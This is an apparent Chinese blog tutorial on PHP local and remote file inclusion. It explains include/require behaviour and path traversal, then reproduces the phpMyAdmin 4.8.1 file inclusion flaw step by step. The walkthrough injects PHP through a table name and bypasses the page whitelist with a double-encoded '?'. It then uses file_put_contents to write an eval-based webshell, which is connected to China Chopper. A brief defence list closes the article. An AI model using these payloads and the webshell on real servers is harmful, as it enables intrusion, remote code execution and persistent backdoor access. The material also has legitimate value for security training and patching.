application.properties引用其他文件_代码审计文件包含

最新推荐文章于 2021-03-09 16:43:28 发布
最新推荐文章于 2021-03-09 16:43:28 发布
阅读量383 收藏
点赞数
文章标签: application.properties引用其他文件 ubuntu include包含路径在哪里写 url 本地文件 不在 sudoers 文件中 本地文件url 本地文件路径url

1.文件包含定义

攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。

(注:包含的文件会被当成脚本文件来解析)

文件包含本身并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。

包含文件本身很有用,可以简化代码。

2.分类

2.1. 本地文件包含

包含服务器上的资源

叫做 LFI(local file inclusion)

2.2. 远程文件包含

通过http协议包含其他地方的资源,

例如:require(‘http://59.63.200.79:8010/1.txt’);

叫做:RFI(remote file inclusion)

默认不开启,需要allow_url_include = On

2.2.1. 开启

php-ini 中 allow_url_include = on

配置完需重启一下 apache

2c1c6d5ca4dfa9e436fc4cc69c16f73c.png

ba39706c5c3c0875343bc43def545832.png

3.PHP函数

3.1. include

使用include引用外部文件时,只有代码执行到include代码段时,调用的外部文件才会被引用并读取,当引用的文件发生错误时,系统只会给出个警告错误,而整个php文件会继续执行

3.1.1. 示例

在 1.txt 中输入 phpinfo();

在 index.php 中写入 include('1.txt');

访问本地

cdc9cf5e7ae9e70e408285b8a23e562d.png

12ef5a56add3b18301f7bd54de21ec27.png

3.1.2.

当在 index.php 中写入include('2.txt');时会报错

不存在2.txt

不会影响代码往下执行

05e7331355c2bf3f646fb4efb0133adf.png

3.2. require

在php文件被执行之前,php解析器会用被引用的文件的全部内容替换require语句,然后与require语句之外的其他语句组成个新的php文件,最后按新的php文件执行程序代码

3.2.1.

将include替换为require

123不再输出,出现问题后不再往下执行

111e435799c1f05efaad4bbd55aa23f7.png

3.2.2.

将1.txt重命名为1.jpg仍能当作php执行

不在乎后缀

75bb8bb37d975f40113ab45d35dc3b54.png

3.3.  include_once与require_once

与前两个类似,区别在于被包含过了,就不会再被包含

4.相对路径与绝对路径

4.1. 相对路径的使用

../../../文件名

C盘下有一个名为flag.jpg的图片马

930078df15169d98e7a7b9333fb88693.png

刷新页面

beced6b97713fa8b2d83435aee491643.png

传参 /?a=phpinfo(); 成功执行

4b5413db99bf723ded1b440356bb24c5.png

已经可以连接菜刀了

如果想要写一个马进去,

传参/?a=file_put_contents(‘8.php’,’’);

4.2.绝对路径

开头带盘符

C:/flag.jpg

4.3.小知识

Cmd中

4.3.1.cd ../

跳到上级目录

a7c8514f6141181a32d7dc9d5773c38a.png

4.3.2. cd 文件夹名

跳到该文件夹

3fb81be08e24017d9517518fb317fdcb.png

4.3.3. php中

在php中这样写

http://192.168.19.131/lfi/2.php?a=qweqweqwe/../../../phpstudy/WWW/lfi/1.txt

也是可以找到需要的文件的,

因为qweqweqwe在相对路径情况下,会被理解成是一个文件夹

2f5c0db1d4023d5cde1c0c1186e4eb44.png

但在php不可以写一些特殊字符来进行传参

如传参?a=@#hiohio*os$%^^$/../../1.txt

4.4.文件包含需要传参时

加&

可以写

http://192.168.19.131/lfi/2.php?a=1.txt&q=phpinfo();

5.漏洞复现

5.1.环境

phpMyAdmin4.8.1

非常常见

f8096b94b48ad9a6b85445f072ca1ce5.png

5.2.代码审计

5.2.1.

Seay中直接搜索include,发现漏洞

964cb8cf0bc72317020e2b6bf6f1d9f6.png

5.2.1.1.
Include $_REQUEST[‘target’]执行条件

56127703167dadbe1d647efe4bb38c24.png

  1. 传参不为空

  2. 传入的target要是一个字符串

  3. 不能为/index/开头

  4. 不在$target_blacklist数组中

      传参不能出现 import.php 或 export.php

    f749edc4bd245fdc42991684644e7dde.png

  5. 满足Core类中的checkPageValidity函数

    ::类的方法

5.2.2. checkPageValidity函数

需要$page在$whitelist数组中,才能返回true

f2911f59c61609c915056f30b3d2ab0f.png

5.2.3. $whitelist

1f8e1fe63d967b05545e3b2cd094bff7.png

5.2.4. $goto_whitelist

66747984cb2b035e07833f36e71389eb.png

5.2.5.

其中当遇到问号时,会进行截断

58dba5df995844339288041c33cafb53.png

5.2.6. 小知识

Get传参会默认一次url解码

5.2.7. Urlcode()函数

进行一次url解码

6f18ef1d6ee9104f8b35de60696539cd.png

5.3. 登录

账号密码root

cf1a608836954c8233f1f84c79eefe35.png

5.4. 新建数据库

c7d904aafdeddbaa72bc1ce5dc76bf99.png

7fe6bc7c35fca59a1958cfadce1f8071.png

5.5.

在表中写入一句话木马

5.5.1.

在名字处写入后点击保存

a0e67990caedb43547e54a85023caf95.png

5.5.2.查看结构

80b3d166d2ca206b33cdd35ea5bf4dad.png

5.6.回到index目录

2af2c52f4a6967a05aeba12a5c587ad2.png

5.7.构造攻击

?target=db_sql.php%253f../../../../../../../phpstudy/MySQL/data/zzy/yy.frm&a=phpinfo();

db_sql.php为白名单中内容

zzy为前面新建的数据库名,yy.frm为表名

b38513189e40481231e0baf140d9d6f2.png

5.8.写入木马

?target=db_sql.php%253f../../../../../../../phpstudy/MySQL/data/zzy/yy.frm&a=file_put_contents(‘xyy.php’,’<?php @eval($_REQUEST["hack"]); ?>’);

c6f608315a9f1bc915dd66af788f1f82.png

4acbc0a222a164fe7736015e5eb988d6.png

5.9.

访问 xyy.php?hack=phpinfo();

成功

018b8153d4c92611d7430f48eaf1362a.png

5.10.连接菜刀

3039718130c660884ba4af92512be3b8.png

5.11.其他

将代码从word复制到url栏时,一些符号会转换为中文

6.防御

  1. 无需情况下设置allow_url_include和allow_url_fopen为关闭

  2. 对可以包含的文件进行限制,可以使用白名单的方式,或者设置可以包含的open_basedir

  3. 建议假定所有输入都是可疑的,尝试对所有输入提交可能可能包含的文件地址,包括     服务器本地文件及远程文件,进行严格的检查,参数中不允许出现../之类的目录跳转符。

  4. 严格检查include类的文件包含函数中的参数是否外界可控。

end

954c3c8d729e52ca20e262105bb52806.png

weixin_39695306
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
activiti和springboot整合只适应application.properties配置文件
12-18
activiti和springboot整合只使用application.properties配置文件,解决了jdbc长时间待机连接被收回报错。使用springProcessEngineConfiguration对activiti管理
SpringBoot 官方文档示例:(18)在application.properties引入其他配置文件
amadeus_liu2的博客
04-28 3803
application.properties内容如下: server.port=8709 spring.datasource.url=jdbc:mysql://xx.xx.xx.xx/test spring.datasource.username=root spring.datasource.password=xxxx spring.datasource.driver-class-name=com.mysql.jdbc.Driver #myName=hi spring.config.import=class
Spring Cloud Config基于服务发现引用公共文件
风灵Erick的博客
12-01 893
Spring Cloud 的配置文件是bootstrap或者application两个,如果服务配置过多那么文件内容肯定较多,在普通的spring 项目都是独立出来一个文件用于标注不同的需求内容,例如数据库,redis等,然后再import导入进来就可以使用,在Spring Cloud要如何引用呢,在使用过程发现了几种方式都记录下来,希望对正在学习spring Cloud的“学友”有所帮助...
springcloud之config
ZhengXinMing1998的博客
07-21 371
官方文档:https://www.springcloud.cc/spring-cloud-dalston.html#_spring_cloud_config 一、git环境搭建 1.GitHub添加SSH公钥: 右键—》git bash here—》输入指令:ssh-keygen -t rsa -C "[email protected]",连按回车—》复制C:\Users\z2364.ssh\id_rsa.pub的内容并粘贴到 2.在码云上创建一个springcloud-config仓库。 3.将代码通
C语言头文件组织与包含原则~
11-09 1215
说明本文假定读者已具备基本的C编译知识。如非特殊说明,文“源文件”指 * .c文件,“头文件”指 *.h文件,“引用”指包含文件。一、头文件作用C语言里,每个源文件是一个模块,头文件...
IDEA WEB项目启动不加载application.properties配置文件.docx
11-13
IDEA WEB项目启动不加载application.properties配置文件,yml配置文件是否也会不加载未尝试,如果有遇到的可以尝试一下。
详解Spring Boot配置文件application.properties
08-25
在本文我们给大家整理了关于Spring Boot 的配置文件 application.properties的相关知识点内容,需要的朋友们参考学习下。
详解application.propertiesapplication.yml文件的区别
08-26
主要介绍了详解application.propertiesapplication.yml文件的区别,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Spring Boot配置文件application.properties使用
08-28
主要介绍了Spring Boot配置文件application.properties使用及spring boot读取application.properties文件的方式,需要的朋友参考下吧
详解spring boot 使用application.properties 进行外部配置
08-31
主要介绍了详解spring boot 使用application.properties 进行外部配置,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
application.properties引用其他文件_小程序工程化系列(一):文件依赖分析
weixin_39638929的博客
11-23 399
一、前言去年(19年10月)在某技术沙龙上分享了《小程序工程化探索》后,陆续有网友联系到我询问一些实现方面的细节,虽然常年顶着黑眼圈修着“福报”,但还是决定抽出时间一个小程序工程化系列,一是希望能帮到部分同学,二是希望能提升自己的总结与表达能力,由于是一个系列,所以每篇文章会尽量聚焦一个点,篇幅不会很长。闲话少述,本篇是小程序工程化系列第一篇,我将会详细介绍如何利用 Webpack 实...
springboot——application.properties配置大全
lzx31806253的博客
04-28 149
# =================================================================== # COMMON SPRING BOOT PROPERTIES # # This sample file is provided as a guideline. Do NOT copy it in its # entirety to your own appl...
java之学习记录 9 - 1 - SpringBoot全局配置文件、自定义配置文件
dear_zx的博客
03-09 2152
全局配置文件能够对一些默认配置值进行修改。Spring Boot使用一个application.properties或者application.yaml的文件作为全局配置文件,该文件存放在src/main/resource目录或者类路径的/config,一般会选择resource目录。接下来,将针对这两种全局配置文件进行讲解 : Spring Boot配置文件的命名及其格式: application.properties application.yaml application.yml 1 a
application.properties引用其他文件_Office文件追踪方案探索
weixin_39979080的博客
11-24 189
背景office套件已经成为大家日常办公必不可少的工具,丰富的文字编辑、演示文稿以及数据处理能力,无一不展示其强大的功能。然后随着形式的多样性,文件的保存和传输让office成为共享、协同的常用方案,而对于一些包含敏感数据的文件,当文件被有意或无意泄漏,可能就会对企业造成无法挽回的损失。本文将对word和excel文件的追踪方案进行探索,通过对文件植入URL,当文件被打开时,即可自动触发...
多个application.properties之间进行关联,application.properties进行拆分springbootspring.profiles.include的妙用
weixin_43834121的博客
12-20 4894
springbootspring.profiles.include的妙用。 我们有这样的一个springboot项目。项目分为开发、测试、生产三个不同阶段(环境),每个阶段都会有db、ftp、redis等的不同配置信息。我们可以使用spring.profiles.include来实现三种不同环境的一键切换。 项目总(入口)配置文件: bootstrap.yml ,内容如下 spring.pro...
application.properties引用其他文件_Go语言入门基础之库源码文件
weixin_39869593的博客
11-22 99
本场 Chat 旨在一分钟教你学会源码文件的拆分以及库源码文件的作用。在本场 Chat ,会讲到如下内容:- 什么是使用库源码文件- 拆分命令源码文件- 代码包的导入路径总会与其所在目录的相对路径- 什么样的程序实体才可以被当前包外的代码引用概念:何为库源码文件不具备命令源码文件的声明自己属于main包、包含无参数声明、结果声明的main参数的特征的源码文件,即为库源码文件。注意:库源...
知识点来啦,记起来!C语言头文件组织与包含原则
HUYA69的博客
09-03 417
  一、头文件作用   C语言里,每个源文件是一个模块,头文件为使用该模块的用户提供接口。接口指一个功能模块暴露给其他模块用以访问具体功能的方法。使用源文件实现模块的功能,使用头文件暴露单元的接口。用户只需包含相应的头文件就可使用该头文件暴露的接口。   通过头文件包含的方法将程序的各功能模块联系起来有利于模块化程序设计:   1)通过头文件调用库功能。在很多场合,源代码不便(或不准...
Java基础篇 - 强引用、弱引用、软引用和虚引用
陌上轩客
08-23 3126
前言 Java执行GC判断对象是否存活有两种方式其一种是引用计数。 引用计数:Java堆每一个对象都有一个引用计数属性,引用每新增1次计数加1,引用每释放1次计数减1。 在JDK 1.2以前的版本,若一个对象不被任何变量引用,那么程序就无法再使用这个对象。也就是说,只有对象处于(reachable)可达状态,程序才能使用它。 从JDK 1.2版本开始,对象的引用被划分为4...
application.properties加载application-dev.properties文件
最新发布
05-27
您可以在 Spring Boot 项目的 src/main/resources 目录下创建...如果您想要使用其他环境配置文件,只需创建另一个类似的文件,例如 application-prod.properties,并将 `spring.profiles.active` 设置为 `prod` 即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值